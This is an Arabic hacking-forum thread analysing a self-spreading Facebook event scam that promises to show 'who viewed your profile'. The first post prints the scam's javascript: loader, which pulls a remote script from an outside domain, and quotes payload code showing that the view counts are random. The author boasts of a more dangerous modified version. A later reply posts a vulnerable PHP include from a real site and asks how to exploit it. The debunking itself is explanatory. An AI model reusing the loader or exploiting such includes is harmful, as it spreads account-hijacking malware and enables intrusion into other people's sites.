التواصل المباشر مع الادارة والاعضاء القدامى من خلال قناة التلغرام



العودة   :: vBspiders Professional Network :: > [ ::. الـقرصـنـة والأختراق ~ The Hidden World Of Hackers .:: ] > قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات

إضافة رد
 
LinkBack أدوات الموضوع انواع عرض الموضوع
قديم 04-24-2011, 01:14 PM   رقم المشاركة : 1 (permalink)
معلومات العضو
KaLa$nikoV
VBSPIDERS TEAM

#~VoLc4n0~#

 
الصورة الرمزية KaLa$nikoV
 

 

 
إحصائية العضو







KaLa$nikoV غير متواجد حالياً

إرسال رسالة عبر MSN إلى KaLa$nikoV

 

 

إحصائية الترشيح

عدد النقاط : 11
KaLa$nikoV is on a distinguished road

افتراضي شرح ثغره الايفنت ونشرها تحت اسم "Edit My Top Profile Viewers Are" بالفيس بوك


السلام عليكم ورحمه الله وبركاته




من فتره قصيره انتشرت ثغره

event

بين كثير من الشباب الي بحبو يعرفو مين الي شاهد بروفايلهم



للاسف ما حد راضي يقتنع انو هاد الكلام كذب وما رح تقدر

تعرف مين الي شاهد بروفايلك

يعني فكك مني راح اضل اتجسس ع بروفايلك ومالك دعوه :P

ههههههههههه



نشوف الثغره الي جديد طلعت واستغلوها الهاكرز بشغل غبي

طبعا الثغره مجرد ازعاج


عباره عن حلقه مغلقه

يعني تنشر نفسها بنفسها من خلال الايفنت

boot event


اتفقت انا وصاحبي

cyber

نعمل اكاونت نفتح فيه الايفنت عشان نحلله ونعرف ايش الي بصير

----------
هام

اقرا الي بكتبه لكن مش ضروري اتطبق بلاش تروح انت الثاني بستين داهيه

ومحد يساوي حريف يحاول يحلل اكواد اذا مكنش فاهم كل خطوه بعملها

---------
اول ما فتحنا اللثغره هذا ما حصل


طيب يا زريقي نفتح ال
post
ألي اجاني منه
tag :P

---

هون انا بدي اركز ع شغلتين
السهم الازرق
199 views
لوني بالفيس بوك من ايام ما سيدي بقى عايش ما وصل لهاد الرقم الاحترافي :P
(بلش عبدو يتخوت وهو مداوم ببروفايلات العالم بقى ليه)

الاشي الثاني الي راح نركز عليه هو السهم الاحمر
وبالاخص تحت الخط الاخضر

هاد اللنك هو بدايه الحلقه المغلقه
ومن هنا تبدا الحكايه
بلش شغلنا ببتبع الثغره وتحليلها




كل الي بدي اياه من النك والصفحه الي قدامي هو هاد الكود
javascript:(a=(b=********).createElement('script') ).src='//bbbindia4.in/jsp.php',b.body.appendChild(a);void(0)


كود بسيط خفيف نظيف ومبين نص سطر
لكن حقيقه هو مليون امر مخفيات تحت اللنك الي باللون الاحمر


نحلل اللنك الي عنا
jsp.php
نشوف الحلاوه الي طلعت معي



هاي مجرد خرابيط ب5 اسطر لسا الكود الكبيير ما ظهر والي هو سبب المصايب
نفتح السوس بيج وراح نحصل ع الثغره الي مجننه الشعب

طيب راح يطلع معانا كلام حوالي 321 سطر
تذكرو بالبدايه كلها كانت نصف سطر

الي بهمني من هاد الكلام كله اني اثبت لكم
صدق او كذب الاعلان الي حصل بخصوص
My Top Profile Viewers




الي يلزمنا نحلل هاد الكود
اقتباس

var message = '%firstname% See who views your Profile ';

var ev = 'check out this new facebook feature! \x0A see your Profile view results by copying and pasting the link below in the address bar \x0A ';

var test = 'My Top Profile Viewers Are:\x0A';

var id = '%tf% - ' + randomnumber1 + ' views,\x0A';

var id1 = '%tf% - ' + randomnumber2 + ' views,\x0A';

var id2 = '%tf% - ' + randomnumber3 + ' views,\x0A';

var id3 = '%tf% - ' + randomnumber4 + ' views,\x0A';

var post = ' see who viewed your facebook Profile @ ';

var postmessage = test + id + id1 + id2 + id3 + post + url + randomnumber;

var chatmessage = message + url + randomnumber;

var redirect = 'http://www.gameindiagame.blogspot.com/';

var eventdesc = ev + url + randomnumber;

var eventname = 'How to see who viewed your profile!!';

var nfriends = 5000;


راح اشرحه شرح سريع عشان انا عارف اغلب الي رح يقراو الكود ما رح يفهمو شيء
الكود بقولك اطبع الكلام هاد
My Top Profile Viewers Are
وانزل سطر
اطبع
اسم شخص من الفرندس وطبع مقدار مشاهدته للبروفايل
هون رح نركز شويه
مقدار مشاهدته للبروفايل
هو رقم عشوائي
randomnumber1
الي بتبع الكود بلقى الكل رقم عشوائي
اذن صفا لنا الكود راح ينزل لنا اسماء عشوائيه من الفرندس عنا
ويضع لنا مشاهدات بارقام عشوائيه

:party:
قلتلكم كذب بكذب



طيب هيك خلصنا كشف الغطاء عن الخداع
ونصيحه مني لا تصدقو هيك كلام مره ثانيه
وفي كمان كذبه اتصل من الفيس بوك مجانا لكن بحس نفسي سخيف لو شرحتها ....(شو عرفك انها كذبه قال من كبرها)


وان شاء الله هاد الشرح يكون كفاره عن .......
(والله بطلع مديون)

طبعا تم سحب الثغره واح نعدلها لاشي اخطر لكن ما رح ننشرها
الا في

VBSPIDERS VIP SECTION

بكل بساطه ما بدي ينتشر الموضوع بين ناس تخرب وتكركب
just to have more best security and info about hacking
visit us http://www.facebook.com/vbspiders
hack to learn not learn hack


DiV by VoLc4n0
وسنه طيبه ع الاخوان المسيحين بمناسبه عيد الفصح
:party:



avp eyvi hghdtkj ,kavih jpj hsl "Edit My Top Profile Viewers Are" fhgtds f,;

التوقيع



هل سأعود يوما
ام هي نهايه الطريق !!
إلهيْ ’ / أبدل عُسَرِنا يسُراً


لا تنسونا من دعائكم







سبحان الله والحمدلله ولا اله الا الله والله اكبر
fb.com/groups/VoLc4n0/
volc4n0@hotmail.com

 

   

رد مع اقتباس
قديم 04-24-2011, 01:38 PM   رقم المشاركة : 2 (permalink)
معلومات العضو
 
الصورة الرمزية k4$p3r-MA
 

 

 
إحصائية العضو








k4$p3r-MA غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
k4$p3r-MA is on a distinguished road

افتراضي


NiC3 FuN فهمت شوي
خخخخخخخخخ

شكرااا اخي عبدو على الشرح

التوقيع

http://www.cafe-hbal.com/up/uploads/13369618701.gif

دعواتكم معنا بالنجاح و لجميع المسلمين
Yes I we will bE BaCk 2013

 

   

رد مع اقتباس
قديم 04-24-2011, 02:06 PM   رقم المشاركة : 3 (permalink)
معلومات العضو
 
الصورة الرمزية PinG^^
 

 

 
إحصائية العضو








PinG^^ غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
PinG^^ is on a distinguished road

افتراضي


يعطيك العافية
بارك الله فيك
+ 6 نجووم
بطل

   

رد مع اقتباس
قديم 04-24-2011, 02:26 PM   رقم المشاركة : 4 (permalink)
معلومات العضو
 
الصورة الرمزية ChucK NoRRis
 

 

 
إحصائية العضو







ChucK NoRRis غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
ChucK NoRRis is on a distinguished road

افتراضي


شكرا شرح كافي للفهم

والله البارحة تلقيت عديد الدعوات للمشاركة في هذا الافنت من مختلف الأصدقاء

ومارديت لانو ما يقلقني كم من مرة تمت زيارة البروفيل

ما أدري ليش هالخرفان يحبو يعرفو عدد الزيارات !!

   

رد مع اقتباس
قديم 04-24-2011, 08:20 PM   رقم المشاركة : 5 (permalink)
معلومات العضو
 
إحصائية العضو






°l||l° نور الظلام °l||l° غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 11
°l||l° نور الظلام °l||l° is on a distinguished road

افتراضي


فهمت ولكن لي تعقيب اخ KaLa$nikoV
انا مرور الشخص للبروفايل لسؤال ؟اعتقد هي شي واضح ومعلوم للكل ؟!
اشكرك ويا كثرر ما ينزلوو وبا الاخيرر يطلع الثغره كذب بكذب
مشكووور :great:
وجزاك الله كل خيررر:party:

التوقيع

من لايعتبرني مكسبا له لن اعتبر غيابه خسارة لي........
ومن لم يقبل بي كحلا لعينه فلن اقبل به نعلا لقدمي .......
________________________________________--
لعن الله كل جرار قواد وقواده يقود على عرضه وعرض غيره
اتفوه على هي الوجيه الي تجيب الهم ولا تفكر الى بااخبث وانجس
شي ....
الكلام موجه للي يكرهوني ونفوسهم دنيئه على الاقل حافضه شرفي
وماشيه بخير اهو افضل من الي يجرر ويتمحن بالنت وما خفي اعظم

 

   

رد مع اقتباس
قديم 04-27-2011, 09:57 PM   رقم المشاركة : 6 (permalink)
معلومات العضو
KaLa$nikoV
VBSPIDERS TEAM

#~VoLc4n0~#

 
الصورة الرمزية KaLa$nikoV
 

 

 
إحصائية العضو







KaLa$nikoV غير متواجد حالياً

إرسال رسالة عبر MSN إلى KaLa$nikoV

 

 

إحصائية الترشيح

عدد النقاط : 11
KaLa$nikoV is on a distinguished road

افتراضي


اقتباس
انا مرور الشخص للبروفايل لسؤال ؟

من بعد اذنك لم افهم
ممكن الكتابه بلغه عربيه فصحى
التوقيع



هل سأعود يوما
ام هي نهايه الطريق !!
إلهيْ ’ / أبدل عُسَرِنا يسُراً


لا تنسونا من دعائكم







سبحان الله والحمدلله ولا اله الا الله والله اكبر
fb.com/groups/VoLc4n0/
volc4n0@hotmail.com

 

   

رد مع اقتباس
قديم 04-28-2011, 01:36 AM   رقم المشاركة : 7 (permalink)
معلومات العضو
ReD-HaT
زائـــر
 
الصورة الرمزية ReD-HaT
 

 

 
إحصائية العضو




 

 

افتراضي


ايه أخ عبدو كنت عارف هاي الكدبة
و شكراا للتوضيح ان شاء الله نقوم باستغلالها بارك الله فيك
بالنسبة ل
اقتباس
وان شاء الله هاد الشرح يكون كفاره عن .......



يا مان انسى هدا
و الله مالك غالط بشي ....
هههههه
و لكن لاتعيدها
بالتوفيق

   

رد مع اقتباس
قديم 04-28-2011, 07:58 PM   رقم المشاركة : 8 (permalink)
معلومات العضو
 
الصورة الرمزية mr_badz
 

 

 
إحصائية العضو





mr_badz غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
mr_badz is on a distinguished road

افتراضي


مشكووووووووووووور وووصل يا بطل

   

رد مع اقتباس
قديم 05-19-2011, 02:30 PM   رقم المشاركة : 9 (permalink)
معلومات العضو
neo-m
Dark magician
 
الصورة الرمزية neo-m
 

 

 
إحصائية العضو







neo-m غير متواجد حالياً

إرسال رسالة عبر MSN إلى neo-m

 

 

إحصائية الترشيح

عدد النقاط : 10
neo-m is on a distinguished road

افتراضي


mercii

التوقيع


 

   

رد مع اقتباس
قديم 05-19-2011, 02:30 PM   رقم المشاركة : 10 (permalink)
معلومات العضو
neo-m
Dark magician
 
الصورة الرمزية neo-m
 

 

 
إحصائية العضو







neo-m غير متواجد حالياً

إرسال رسالة عبر MSN إلى neo-m

 

 

إحصائية الترشيح

عدد النقاط : 10
neo-m is on a distinguished road

افتراضي


مشكور

التوقيع


 

   

رد مع اقتباس
قديم 06-02-2011, 04:03 PM   رقم المشاركة : 11 (permalink)
معلومات العضو
 
الصورة الرمزية hank00sh
 

 

 
إحصائية العضو








hank00sh غير متواجد حالياً

إرسال رسالة عبر MSN إلى hank00sh

 

 

إحصائية الترشيح

عدد النقاط : 11
hank00sh is on a distinguished road

افتراضي


يسلمو فلكانو

حتى انا ما صدقت حكايه الاتصال المجاني من الفيس بوك من احد الاخوى منزل موضوع

هههههههههههههههههاي

وفيه واحد رد عليه وجرب التجربه ونفعت معاه بس انا متاكد فيه شي

تقبل مروري

التوقيع

لا اله الا الله محمد رسول الله استغفر الله واتوب اليه

استغفر الله

استغفر الله

استغفر الله

HaNkOoSh HaCkEr

 

   

رد مع اقتباس
قديم 07-02-2011, 02:35 PM   رقم المشاركة : 12 (permalink)
معلومات العضو
 
الصورة الرمزية b10001
 

 

 
إحصائية العضو







b10001 غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
b10001 is on a distinguished road

افتراضي


oké__________oké

me________me

you_____you

التوقيع

http://img198.imageshack.us/img198/1722/sansredrh.jpg

http://im16.gulfup.com/2011-10-15/131870922211.gif
[SIZE="7"][COLOR="Lime"]

 

   

رد مع اقتباس
قديم 07-03-2011, 03:21 PM   رقم المشاركة : 13 (permalink)
معلومات العضو
 
الصورة الرمزية JetLi
 

 

 
إحصائية العضو






JetLi غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
JetLi is on a distinguished road

افتراضي


السلام عليكم لدى احد المواقع ثغرة RFI صعبة الاستغلال جربت فيه اجميع الحيل حتى %00 جربته
هذه الثغرة على ما اعتقد كود البي اتش بي بها هو

كود PHP:
// lang value are 'en' so full address will be "enlanguage/language.php"

$s=$_GET['lang']."language/language.php";
require_once(
$s);

..... 
افيدوني كيف استفيد منها مع انها حاظرة http: وتعطي خطأ هل يمكنيي استخدامها كـ
LFI ?:jap:
التوقيع

http://www.pollsb.com/photos/o/33924...tony_stark.jpg
التهكير يجعلك تنظر للحياة بعمق وترو

 

   

رد مع اقتباس
قديم 07-04-2011, 03:47 PM   رقم المشاركة : 14 (permalink)
معلومات العضو
 
إحصائية العضو







المخترق الصغير غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
المخترق الصغير is on a distinguished road

افتراضي


شكر لك اخي عبدو عالشرح
التوقيع

ارفع راسك فانت مغربي..

مغربي و افتخر
الصحـــــــــراء مــــــــغربية

 

   

رد مع اقتباس
قديم 07-04-2011, 03:50 PM   رقم المشاركة : 15 (permalink)
معلومات العضو
 
إحصائية العضو







المخترق الصغير غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
المخترق الصغير is on a distinguished road

افتراضي


اقتباس
مشاهدة المشاركة المشاركة الأصلية كتبت بواسطة IronMan
السلام عليكم لدى احد المواقع ثغرة RFI صعبة الاستغلال جربت فيه اجميع الحيل حتى %00 جربته
هذه الثغرة على ما اعتقد كود البي اتش بي بها هو
كود PHP:
// lang value are 'en' so full address will be "enlanguage/language.php"

$s=$_GET***91;'lang'***93;."language/language.php";
require_once(
$s);

..... 
افيدوني كيف استفيد منها مع انها حاظرة http: وتعطي خطأ هل يمكنيي استخدامها كـ
LFI ?:jap:


اخي ضع الرد في القسم الخاص هدا موضوع الاخ عبدو و يتحدث عن ثغرة اخرى ..:yes:
التوقيع

ارفع راسك فانت مغربي..

مغربي و افتخر
الصحـــــــــراء مــــــــغربية

 

   

رد مع اقتباس
إضافة رد

مواقع النشر (المفضلة)


تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are متاحة
Pingbacks are متاحة
Refbacks are متاحة

الانتقال السريع


الساعة الآن 02:59 AM


[ vBspiders.Com Network ]

SEO by vBSEO 3.6.0